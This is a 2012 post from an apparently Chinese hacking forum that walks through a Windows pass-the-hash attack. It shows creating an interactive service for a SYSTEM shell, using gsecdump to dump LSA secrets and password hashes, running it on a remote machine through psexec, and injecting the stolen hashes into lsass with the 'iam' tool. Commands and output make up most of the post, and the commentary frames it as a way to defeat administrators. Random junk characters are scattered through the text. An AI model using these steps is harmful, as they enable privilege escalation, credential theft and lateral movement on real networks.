找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2094|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
( B5 ?9 C, f+ V& d0 g7 F% o6 `+ h* i2 I0 H5 R# N5 w
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact( G) o& I  D' S* d3 u2 d# S9 q
[SC] CreateService SUCCESS
; V, h2 i0 d2 V6 L! ?
) C4 P: L4 X2 ^( O. P( T# o* TC:\>sc start shellcmdline  L( u$ b# \1 R. M; \- X
[SC] StartService FAILED 1053:
& X& z/ M7 a/ |2 d% V3 E, _% j4 o) p& Z5 R8 h
The service did not respond to the start or control request in a timely fashion.
/ \1 W! k# E6 I. n  T$ Q* o; J
% a$ k" q% p6 c* d# ~* IC:\>sc delete shellcmdline. k; h3 w( w. ?3 P
[SC] DeleteService SUCCESS
& j; g1 O* Y6 R: N. F
' P: I$ P+ V4 o, ?1 _8 o4 c5 T------------- M: }0 H8 a/ d) i+ u9 ~; H, e

/ v$ J# A$ ~- }  o8 pThen in the new DOS window:
  s4 P6 V" j: W- j2 c) I9 ?& [9 z- y
Microsoft Windows XP [Version 5.1.2600]: O. x2 c# N3 k' j  [2 k
(C) Copyright 1985-2001 Microsoft Corp.
4 C5 h. ]. D6 q, O  l
! I' o4 Y) T( U7 w" M0 X/ FC:\WINDOWS\system32>whoami
: x. z8 m( j9 _$ gNT AUTHORITY\SYSTEM
* J0 g0 N$ w# Y/ P! G2 Q9 j: E& I3 B
; [- P, ~1 ?( K% L+ U. DC:\WINDOWS\system32>gsecdump -h8 J) b2 v: F, M8 m3 B
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
- S9 t  T$ [9 z& ~usage: gsecdump [options]: }8 h" y6 b5 n! M* ?! Q* a

/ }( r& b- u" {- C* y( g# K; ?! qoptions:
% I, ^( J1 P, m( W5 d-h [ --help ] show help: L2 D0 q$ u# D0 Y5 Y4 P
-a [ --dump_all ] dump all secrets& ^6 ]! M8 t' i1 S5 z
-l [ --dump_lsa ] dump lsa secrets! K8 R& E3 [( ^% m, P. a( Q0 k+ s
-w [ --dump_wireless ] dump microsoft wireless connections
5 C) L* h$ U. {- C-u [ --dump_usedhashes ] dump hashes from active logon sessions
* J' ~( [1 h: z5 b( t-s [ --dump_hashes ] dump hashes from SAM/AD
/ j2 i  t, i  `( d( B: k8 X1 o2 ~) {: R- ]9 Y/ _8 q5 g
Although I like to use:9 r) F; x- u0 i+ W! ?1 N

3 \! u7 b; K; q2 b/ m' TPsExec v1.83 - Execute processes remotely
" V2 E. t, j" u- V$ e8 RCopyright (C) 2001-2007 Mark Russinovich
* I& {0 b  K/ m3 Q: MSysinternals - 链接标记[url]www.sysinternals.com[/url]
: ~  }! j9 D7 H! d1 K5 j! S& @! ^0 j; t. [# L$ v+ N$ L. S
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT/ C, [* ]9 h4 N" \$ V/ q
( j2 ^- D7 z" _7 l& x: T: {4 I
to get the hashes from active logon sessions of a remote system.
/ z. s4 @: l- z. x% ?5 ?5 J) J; U, G. j
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
2 n# Y/ _; D, ^/ y1 _$ l' u( ]) s/ p8 ?! P
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了." H  n* p6 `/ F' {0 L; t. j1 Y
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
2 @) z- }8 q% B: Y$ m7 W+ F
6 ]5 }# W& o0 A0 `; j' {我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。4 t2 m. ~& h) Z1 q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表